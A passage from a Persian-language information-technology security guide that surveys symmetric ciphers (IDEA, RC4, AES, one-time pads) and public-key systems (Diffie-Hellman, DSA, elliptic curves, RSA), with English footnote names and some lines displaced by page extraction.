ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻴﺸﺘﺮ ﺍﺯ IDEAﺗﻮﺳﻂ ﻳﻜﺴﺮﻱ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺍﻧﺤﺼﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ
ﺩﺭ ﺍﺧﺘﻴﺎﺭ Ascom–Tech AGﺩﺭ ﺳﻮﻟﻮﺗﻮﺭﻥ ﺳﻮﺋﻴﺲ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻣﺤﺪﻭﺩ ﺷﺪﻩ ﺍﺳﺖ.
RC4
٩٢
ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺮﻳﺎﻧﻲ ﺩﺭ ﺍﺑﺘﺪﺍ ﺗﻮﺳﻂ ﺭﻭﻟﻨﺪ ﺭﻳﻮﺳﺖ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ "ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎﻱ "RSAﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﺯ
ﻣﺤﺮﻣﺎﻧﻪ ﺗﺠﺎﺭﻱ ﻣﺨﻔﻲ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﺷﺪ .ﺍﻟﮕﻮﺭﻳﺘﻢ ﺩﺭ ﺳﺎﻝ ۱۹۹۴ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻛﺎﺭﺑﺮ ﮔﻤﻨﺎﻡ UseNetﺍﻓﺸﺎ ﺷﺪ ﻭ ﺑﻨﻈﺮ ﻣﻲﺭﺳـﺪ ﻧـﺴﺒﺘﹰﺎ
ﻗﻮﻱ ﺑﺎﺷﺪ RC4 .ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﺑﻴﻦ ۱ﺗﺎ ۲۰۴۸ﺑﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ.
(AES) Rijndael
ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻮﺳﻂ ﻳﻮﻫﺎﻥ ﺩﻳﻤﻦ ٩٣ﻭ ﻭﻳﻨﺖ ﺭﻳﺠﻤﻦ ٩٤ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺩﺭ ﻣﺎﻩ ﺍﻛﺘﺒﺮ ﺳﺎﻝ ۲۰۰۰ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻱ
) ٩٥(NISTﺑﻌﻨﻮﺍﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺟﺪﻳﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﺸﺮﻓﺘﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﮔﺰﻳﺪﻩ ﺷﺪ Rijndeal .ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣـﺰﻱﺳـﺎﺯﻱ ﻓـﻮﻕﺍﻟﻌـﺎﺩﻩ
ﺳﺮﻳﻊ ﻭ ﺟﻤﻊ ﻭ ﺟﻮﺭ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﺑﻪ ﻃﻮﻝ ۱۲۸ﺗﺎ ۱۹۲ﻳﺎ ۲۵۶ﺑﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ.
ﺭﻣﺰﻧﮕﺎﺭﻫﺎ ﻗﺪﺭﺕ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺑﺎ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻣﻘﺎﻳﺴﻪﺍﻱ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ .ﻭﻗﺘﻲ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻣﻨﺘﺸﺮ ﻣﻲﺷـﻮﺩ ،ﺳـﺎﻳﺮ ﺭﻣﺰﻧﮕﺎﺭﻫـﺎ
ﺑﺪﻧﺒﺎﻝ ﻧﻘﺎﻳﺺ ﻳﺎ ﺿﻌﻔﻬﺎﻱ ﺁﻥ ﻣﻲﮔﺮﺩﻧﺪ .ﺑﻪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛﻨﻨﺪ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳـﺪ ﺍﺑـﺪﺍﻉ ﻛـﺮﺩﻩﺍﻧـﺪ ﺍﻋﺘﻤـﺎﺩ ﻧﻜﻨﻴـﺪ،
ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺭﻭﺵ ﻛﺎﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺁﺷﻜﺎﺭ ﻛﻨﻨﺪ ﺷﺎﻳﺪ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺍﻋﺘﺒﺎﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﺸﺎﻥ ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ
ﻣﻲﻛﻨﺪ .ﺩﺭ ﻋﻤﻞ ﺩﻟﻴﻠﻲ ﺑﺮﺍﻱ ﻣﺨﻔﻴﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ،ﭼﺮﺍﮐﻪ ﺍﻣﻨﻴﺖ ﻭﺍﻗﻌﻲ ﺩﺭ ﺷﻔﺎﻓﻴﺖ ﺍﺳﺖ.
ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺭﻙ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﺍﻧﺘﺸﺎﺭ ﻳﺎﻓﺘﻦ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻳﺎ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺿﻤﺎﻧﺖ ﻧﻤﻲﻛﻨﺪ ﻛﻪ ﻧﻘـﺎﻳﺺ
ﺁﻥ ﻳﺎﻓﺘﻪ ﺧﻮﺍﻫﻨﺪ ﺷﺪ .ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ WEPﻛﻪ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺷﺒﻜﻪﺳﺎﺯﻱ 802.11ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺑﻮﺩ ،ﺗﺎ ﭘـﻴﺶ ﺍﺯ ﺁﻧﻜـﻪ
ﻳﻚ ﻧﻘﺺ ﻣﻬﻢ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺁﻥ ﻳﺎﻓﺘﻪ ﺷﻮﺩ ﺳﺎﻟﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺷﺖ -ﻧﻘﺺ ﺩﺭ ﺗﻤﺎﻡ ﺁﻥ ﻣﺪﺕ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ،ﻭﻟﻲ ﻫـﻴﭽﻜﺲ ﺑـﻪ
ﺍﺷﻜﺎﻟﻲ ﺑﺮﺧﻮﺭﺩ ﻧﻜﺮﺩﻩ ﺑﻮﺩ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺑﺪﻧﺒﺎﻝ ﻳﻚ ﻧﻘﺺ ﺑﮕﺮﺩﺩ.
Padﻫﺎﻱ ﻳﻜﺒﺎﺭ ﻣﺼﺮﻑ
ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻛﻪ ﺛﺎﺑﺖ ﺷﺪﻩ ﻧﺎﺷﻜﺴﺘﻨﻲ ﺍﺳﺖ ،ﺳﻴﺴﺘﻢ " Padﻳﻜﺒﺎﺭ ﻣﺼﺮﻑ" ﺍﺳـﺖ .ﺩﺭ ﺍﻳـﻦ ﻧـﻮﻉ ﺍﻟﮕـﻮﺭﻳﺘﻢ
ﻃﺮﻓﻬﺎﻱ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪﻩ ﺍﺭﺗﺒﺎﻁ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﺸﻜﻞ ﺍﺯ ﻳﻚ ﺭﺷﺘﺔ ﻃﻮﻻﻧﻲ ﺍﺯ ﺑﺎﻳﺘﻬﺎﻱ ﺗﺼﺎﺩﻓﻲ )ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﭘﻴﺎﻣﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺍﺭﺳﺎﻝ ﺷـﻮﺩ(
ﺭﺍ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﻣﻲﮔﺬﺍﺭﻧﺪ .ﺑﺎ ﺗﺒﺪﻳﻞ ﻫﺮ ﺑﺎﻳﺖ ﭘﻴﺎﻡ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺑﺎﻳﺖ ﻛﻠﻴﺪ ،ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﺷﻮﺩ ،ﻭ ﺳﭙﺲ ﺁﻥ ﺑﺎﻳﺖ ﻛﻠﻴـﺪ
ﺍﺯ ﺑﻴﻦ ﻣﻲﺭﻭﺩ ﻭ ﺩﻳﮕﺮ ﻫﻴﭽﮕﺎﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﺩ .ﭼﻮﻥ ﻛﻠﻴﺪ ﺗﺼﺎﺩﻓﻲ ﻭ ﻏﻴﺮ ﺗﻜﺮﺍﺭﺷﻮﻧﺪﻩ ﺍﺳﺖ ،ﺣﺘﻲ ﻳﻚ ﺣﻤﻠـﺔ ﺟـﺴﺘﺠﻮﻱ
ﻛﻠﻴﺪ ﻧﻴﺰ ﻋﻤﻠﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ ،ﭼﺮﺍﻛﻪ ﺑﺎ ﻫﺮ ﻛﻠﻴﺪ ﺧﺎﺹ ،ﻫﺮ ﭘﻴﺎﻡ ﻣﻤﻜﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﻟﻴﺪ ﺷﻮﺩ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻏﻴﺮﻋﻤﻠـﻲ ﻣـﻲﻛﻨـﺪ .ﻋـﻼﻭﻩ ﺑـﺮ ﻣـﺸﻜﻼﺕ ﻣﻌﻤـﻮﻝ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ )ﺗﺒﺎﺩﻝ ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺍﻳﻤﻦ ﻛﻠﻴﺪﻫﺎ( ﺗﻮﻟﻴﺪ ﻣﻘﺎﺩﻳﺮ ﺯﻳﺎﺩ ﺩﺍﺩﻩﻫﺎﻱ ﻭﺍﻗﻌﹰﺎ ﺗﺼﺎﺩﻓﻲ ﻫﻤﻴﺸﻪ ﺳﺎﺩﻩ ﻧﻴـﺴﺖ ،ﻭ ﺗﻮﺯﻳـﻊ ﻣﻘـﺎﺩﻳﺮ ﺯﻳـﺎﺩ
ﻲ ﻧﻴﺎﺯﻣﻨـﺪ ﺑـﻪ
ﺩﺍﺩﻩﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻛﻠﻴﺪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺸﻜﻞﺳﺎﺯ ﺑﺎﺷﺪ .ﺑﺎ ﻫﻤﺔ ﺍﻳﻦ ﺍﻭﺻﺎﻑ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻛﻤﺎﺑﻴﺶ ﺑﺮﺍﻱ ﭘﻴﻮﻧﺪﻫﺎﻱ ﺍﺭﺗﺒـﺎﻃ ﹺ
ﺍﻣﻨﻴﺖ ﻓﻮﻕﺍﻟﻌﺎﺩﻩ ﺯﻳﺎﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ.
ﺍﻟﮕﻮﺭﻳﺘﻢﻫﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ
ﭘﺪﻳﺪ ﺁﻭﺭﺩﻥ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻣﺸﻜﻠﺘﺮ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺍﺳﺖ ﻭ ﺗﻌﺪﺍﺩ ﻛﻤﺘﺮﻱ ﺍﺯ ﺁﻧﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﺩﺍﺭﻧﺪ .ﭼﻮﻥ ﻛﻠﻴﺪﻫﺎﻱ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻭ ﻧﺎﻣﺘﻘﺎﺭﻥ ﺍﺳﺎﺳﹰﺎ ﺑﻪ ﺻﻮﺭﺗﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ،ﺑﺎ ﻣﻘﺎﻳـﺴﺔ
Roland Rivest
Joan Daemen
Vinet Rijmen
National Institute of Standards & Technology
92
93
94
95
٢٩٧
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻃﻮﻝ ﻛﻠﻴﺪﻫﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺑﻪ ﺍﺳﺘﺤﻜﺎﻡ ﻧﺴﺒﻲ ﻭ ﻗﺪﺭﺕ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﭘﻲﺑﺮﺩ .ﻃﻮﻝ ﻛﻠﻴﺪ ﺩﺭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴـﺪ ﺭﻣـﺰ ﻫﻤﮕـﺎﻧﻲ
ﻻ ﺍﺯ ۵۱۲ﺗﺎ ۲۰۴۸ﻭ ۴۰۹۶ﺑﻴﺖ ﺍﺳﺖ ،ﻭ ﺍﻟﺒﺘﻪ ﺑﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻃـﻮﻝ ۱۰۲۴ﺑﻴـﺖ ﺑـﺮﺍﻱ ﺁﻳﻨـﺪﻩﺍﻱ ﻗﺎﺑـﻞ
ﻣﻌﻤﻮ ﹰ
ﭘﻴﺶﺑﻴﻨﻲ ﻛﺎﻓﻲ ﺍﺳﺖ .ﻓﻬﺮﺳﺖ ﺯﻳﺮ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻣﺘﺪﺍﻭﻝ ﺍﻣﺮﻭﺯ ﺭﺍ ﺧﻼﺻﻪ ﻛﺮﺩﻩ ﺍﺳﺖ:
Diffie-Hellman
ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﻣﺒﺎﺩﻟـﺔ ﻛﻠﻴـﺪﻫﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﻣﻴـﺎﻥ ﻃﺮﻓﻬـﺎﻱ ﺍﺭﺗﺒـﺎﻁ Diffie-Hellman .ﺩﺭ ﺣﻘﻴﻘـﺖ ﻳـﻚ ﺭﻭﺵ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻭ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻴﺴﺖ ،ﺑﻠﻜﻪ ﻳﻚ ﺭﻭﺵ ﺗﻮﺳﻌﻪ ﻭ ﺗﺒﺎﺩﻝ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﺸﺘﺮﻙ ﺭﻭﻱ ﻳﻚ ﻛﺎﻧﺎﻝ ﺍﺭﺗﺒﺎﻃﻲ ﻫﻤﮕﺎﻧﻲ ﺍﺳـﺖ .ﺩﺭ ﻭﺍﻗـﻊ ﺩﻭ
ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﺑﺮ ﺳﺮ ﭼﻨﺪ ﻣﻘﺪﺍﺭ ﻋﺪﺩﻱ ﻣﺘﺪﺍﻭﻝ ﺗﻮﺍﻓﻖ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺁﻧﮕﺎﻩ ﻫﺮ ﻃﺮﻑ ﻳﻚ ﻛﻠﻴﺪ ﭘﺪﻳـﺪ ﻣـﻲﺁﻭﺭﺩ .ﺗﺒـﺪﻳﻼﺕ ﺭﻳﺎﺿـﻲ ﻛﻠﻴـﺪﻫﺎ
ﻣﺒﺎﺩﻟﻪ ﻣﻲﺷﻮﺩ ،ﻭ ﺁﻧﮕﺎﻩ ﻫﺮ ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻛﻠﻴﺪ ﻧﺸﺴﺖ ٩٦ﺛﺎﻟﺚ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨـﺪ ﻛـﻪ ﺗﻮﺳـﻂ ﻣﻬـﺎﺟﻤﻲ ﻛـﻪ ﻫـﺮ ﺩﻭ ﻣﻘـﺪﺍﺭ
ﺗﺒﺎﺩﻝﺷﺪﻩ ﺭﺍ ﻣﻲﺩﺍﻧﺪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺪﺳﺖ ﺁﻳﺪ.
DSA/DSS
٩٧
٩٨
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ) (DSSﺗﻮﺳﻂ ﺁﮊﺍﻧﺲ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻱ
ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻋﻤﻮﻣﻲ ﭘﺮﺩﺍﺯﺵ ﺍﻃﻼﻋﺎﺕ ) ٩٩(FIPSﺍﻧﺘﺨـﺎﺏ ﺷـﺪ DSS .ﺑـﺮ ﺍﺳـﺎﺱ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ )(DSA
ﭘﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ .ﺍﮔﺮﭼﻪ DSAﻫﺮ ﻃﻮﻟﻲ ﺭﺍ ﺑﺮﺍﻱ ﻛﻠﻴﺪ ﻣﺠﺎﺯ ﻣﻲﺷﻤﺎﺭﺩ ،ﻭﻟﻲ ﺩﺭ DSS FIPSﻓﻘﻂ ﻛﻠﻴﺪﻫﺎﻱ ﺑﺎ ﻃﻮﻝ ﺑـﻴﻦ ۵۱۲
ﻭ ۱۰۲۴ﺑﻴﺖ ﻣﺠﺎﺯ ﻫﺴﺘﻨﺪ .ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﮔﻔﺘﻪ ﺷﺪ DSSﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﺩ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﻳـﻚ
ﻧﻮﻉ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ DSAﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
١٠٠
ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ
ﻱ ﻛﻠﻴﺪ ﻫﻤﮕﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺠﺎﻱ ﺭﻭﺵ ﻗﺪﻳﻤﻲ ﺗﻮﺍﺑﻊ ﻟﮕﺎﺭﻳﺘﻤﻲ ،ﻣﺒﺘﻨﻲ ﺑﺮ
ﻱ ﺭﻣﺰﮔﺬﺍﺭ ﹺ
ﻲ ﺑﻴﻀﻮﻱ ﺳﻴﺴﺘﻤﻬﺎ ﹺ
ﻱ ﻣﻨﺤﻨ ﹺ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭ ﹺ
ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ ﻣﻲﺑﺎﺷﻨﺪ .ﻣﺰﻳﺖ ﻛﺎﺭﺑﺮﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻨﺤﻨﻲ ﺑﻴﻀﻮﻱ ﺍﺯ ﺍﻳﻦ ﺣﻘﻴﻘﺖ ﻧـﺸﺄﺕ ﻣـﻲﮔﻴـﺮﺩ ﻛـﻪ ﻫـﻴﭻ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﻗﺎﺑـﻞ
ﻣﺤﺎﺳﺒﻪﺍﻱ ﺑﺮﺍﻱ ﻣﺤﺎﺳﺒﺔ ﻟﮕﺎﺭﻳﺘﻤﻬﺎﻱ ﻣﻨﻔﺼﻞ ﻣﻨﺤﻨﻴﻬﺎﻱ ﺑﻴﻀﻮﻱ ﺷﻨﺎﺧﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻛﻠﻴﺪﻫﺎﻱ ﻛﻮﺗﺎﻩ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻨﺤﻨﻲ ﺑﻴﻀﻮﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭﺟﻪ ﺑﺎﻻﺋﻲ ﺍﺯ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻪ ﺍﺭﻣﻐﺎﻥ ﺑﻴﺎﻭﺭﻧﺪ ،ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﻣﺤﺎﺳﺒﺎﺕ ﺁﻧﻬﺎ ﻫﻢ ﺑﺴﻴﺎﺭ
ﺳﺮﻳﻊ ﺍﺳﺖ .ﻣﻨﺤﻨﻲﻫﺎﻱ ﺑﻴﻀﻮﻱ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻛﺎﺭﺍﻳﻲ ﺑﺎﻻ ﺑﺼﻮﺭﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﻧﺪ.
RSA
ﺳﻴﺴﺘﻢ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﺍﺻﺎﻟﺖ ﻳﺎ ﺳﻨﺪﻳﺖ ﺍﻃﻼﻋﺎﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻜﺎﺭ ﺭﻭﻧـﺪ .ﺩﺭ
ﺍﻳﻦ ﺳﻴﺴﺘﻢ ،ﻛﻠﻴﺪ ﺭﻣﺰ ﺑﺴﺘﻪ ﺑﻪ ﻧﻮﻋﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻫﺮ ﻃﻮﻟﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ
ﻻ ۱۲۸ﺗﺎ ۲۵۶ﺑﻴـﺖ ﻃـﻮﻝ
ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﻳﻚ ﻓﺎﻳﻞ )ﺑﺰﺭﮒ ﻳﺎ ﻛﻮﭼﻚ( ﺭﺍ ﺑﻪ ﻳﻚ ﻋﺪﺩ ﺑﺰﺭﮒ ﺗﺒﺪﻳﻞ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺩﺍﺭﺩ .ﺑﻬﺘﺮﻳﻦ ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻭﺍﺟﺪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺯﻳﺮ ﻫﺴﺘﻨﺪ:
Session Key
Digital Signature Standard
)U.S. National Security Agency (NSA
Federal Information Processing Standard
Digital Signature Algorithm
Adi Shamir
Leonard Adleman
96
97
98
99
100
101
102
ﺑﺨﺶ ﭘﻨﺠﻢ
RSAﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺸﻬﻮﺭ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻫﻤﮕﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺳﺎﻝ ۱۹۷۷ﻣﻴﻼﺩﻱ ﺗﻮﺳﻂ ﺳﻪ ﺍﺳﺘﺎﺩ ﺩﺍﻧﺸﮕﺎﻩ MITﺑﻪ ﻧﺎﻣﻬﺎﻱ ﺭﻭﻟﻨﺪ
ﺭﻳﻮﺳﺖ ،ﺍﺩﻱ ﺷﻤﻴﺮ ،١٠١ﻭ ﻟﺌﻮﻧﺎﺭﺩ ﺁﺩﻟﻤﻦ ١٠٢ﭘﺪﻳﺪ ﺁﻣﺪ .ﺍﺯ RSAﻫﻢ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻫـﻢ ﺑﻌﻨـﻮﺍﻥ ﻣﺒﻨـﺎﻱ ﻳـﻚ
٢٩٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
